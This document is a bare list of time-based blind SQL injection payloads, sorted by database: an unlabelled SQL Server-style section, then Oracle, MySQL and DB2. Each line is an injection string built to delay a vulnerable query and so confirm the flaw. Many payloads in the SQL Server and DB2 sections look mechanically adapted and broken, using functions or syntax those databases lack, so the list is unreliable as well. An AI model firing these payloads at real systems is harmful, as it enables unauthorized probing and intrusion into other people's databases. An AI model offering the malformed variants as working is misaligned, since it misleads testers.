0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)/* OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- */
R(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0))-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0) AND 5=5)-- 

WAITFOR DELAY '00:00:05'-- 
WAITFOR DELAY '00:00:05' OR ''=' OR WAITFOR DELAY '00:00:05'-- 
%2c(SELECT%35%5FROM%5(SELECT WAITFOR DELAY '00:00:05'))a 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))v 
(SELECT WAITFOR DELAY '00:00:05') 
'%2b(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a)%2b' 
,(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
DESC%2C(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
-1' OR 1+1=3d((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 
-1' OR 1=1+((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 

(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY# 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY-- 
''+(SELECT (FROM (SELECT WAITFOR DELAY '00:00:05'))a)+'' 

(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))/*+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))*/ 
'',)+/test/%26%26%09WAITFOR DELAY '00:00:05'%09-- 


oracle

0' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
0' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
IF (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
0' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
IF (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
IF (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual/* OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- */
R((SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual))-- 
IF (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)' OR (SELECT CASE WHEN (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual)-- 
(IF (TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') = TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual) AND 5=5)-- 

DBMS_LOCK.SLEEP(5)-- 
DBMS_LOCK.SLEEP(5) OR ''='' OR DBMS_LOCK.SLEEP(5)-- 
%2c(SELECT%35%5FROM%5(SELECT DBMS_LOCK.SLEEP(5) FROM dual))a 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))v 
(SELECT DBMS_LOCK.SLEEP(5) FROM dual) 
'%2b(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))a)%2b' 
,(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))a 
DESC%2C(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))a 
-1' OR 1+1=3d((SELECT 1+FROM+(SELECT DBMS_LOCK.SLEEP(5) FROM dual))A) 
-1' OR 1=1+((SELECT 1+FROM+(SELECT DBMS_LOCK.SLEEP(5) FROM dual))A) 

(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))YYYY 
(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))YYYY# 
(SELECT * FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))YYYY-- 
''+(SELECT (FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))a)+'' 

(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))%2f'+ 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))+"" 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))+"" 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))%2f'+ 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))+"" 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))%2f 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))/*+ 
(SELECT 0 FROM (SELECT DBMS_LOCK.SLEEP(5) FROM dual))*/ 
'',)+/test/%26%26%09DBMS_LOCK.SLEEP(5)%09-- 

My sql

MySQL Blind (Time Based) Payload list:

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
if(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))OR'
if(now()=sysdate(),sleep(5),0)/*XOR(if(now()=sysdate(),sleep(5),0))OR*/
R(if(now()=sysdate(),sleep(5),0))OR''
if(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))OR'XOR
(if(now()=sysdate(),sleep(5),0) and 5=5)/*

SLEEP(5)/* or SLEEP(5) or '' or SLEEP(5) or */
%2c(select%35%5from%5(select(sleep(5))))a
(select(0)from(select(sleep(5))))v
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2C(select*from(select(sleep(5)))a)
-1' or 1+1=3d((SELECT 1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=1+((SELECT+1+FROM+(SELECT+SLEEP(5))A))

(SELECT * FROM (SELECT(SLEEP(5))YYYY)
(SELECT * FROM (SELECT(SLEEP(5))YYYY)# 
(SELECT * FROM (SELECT(SLEEP(5))YYYY)-- 
''+(select(from(select(sleep(5)))a)+' 

(select(0)from(select(sleep(5))))%2f'+
(select(0)from(select(sleep(5))))+'"
(select(0)from(select(sleep(5))))+'"
(select(0)from(select(sleep(5))))%2f'+ 
(select(0)from(select(sleep(5))))+""+ 
(select(0)from(select(sleep(5))))%2f
(select(0)from(select(sleep(5))))/*+ 
(select(0)from(select(sleep(5))))*/ 
'',)+/test/%26%26%09sLeEp(5)%09--+


----------------------------------------------------------------------------------------------------------
db2
0' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
0' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
IF (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN SLEEP(5) ELSE NULL END FROM sysibm.sysdummy1)-- 
0' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
IF (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN SLEEP(5) ELSE NULL END FROM sysibm.sysdummy1)' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
IF (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN SLEEP(5) ELSE NULL END FROM sysibm.sysdummy1/* OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- */
R((SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1))-- 
IF (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN SLEEP(5) ELSE NULL END FROM sysibm.sysdummy1)' OR (SELECT CASE WHEN (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN 1 ELSE SLEEP(5) END FROM sysibm.sysdummy1)-- 
(IF (CURRENT TIMESTAMP = CURRENT TIMESTAMP) THEN SLEEP(5) ELSE NULL END FROM sysibm.sysdummy1) AND 5=5)-- 

SLEEP(5)-- 
SLEEP(5) OR ''='' OR SLEEP(5)-- 
%2c(SELECT%35%5FROM%5(SELECT SLEEP(5) FROM sysibm.sysdummy1))a 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))v 
(SELECT SLEEP(5) FROM sysibm.sysdummy1) 
'%2b(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))a)%2b' 
,(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))a 
DESC%2C(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))a 
-1' OR 1+1=3d((SELECT 1+FROM+(SELECT SLEEP(5) FROM sysibm.sysdummy1))A) 
-1' OR 1=1+((SELECT 1+FROM+(SELECT SLEEP(5) FROM sysibm.sysdummy1))A) 

(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))YYYY 
(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))YYYY# 
(SELECT * FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))YYYY-- 
''+(SELECT (FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))a)+'' 

(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))%2f'+ 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))+"" 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))+"" 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))%2f'+ 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))+"" 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))%2f 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))/*+ 
(SELECT 0 FROM (SELECT SLEEP(5) FROM sysibm.sysdummy1))*/ 
'',)+/test/%26%26%09SLEEP(5)%09-- 



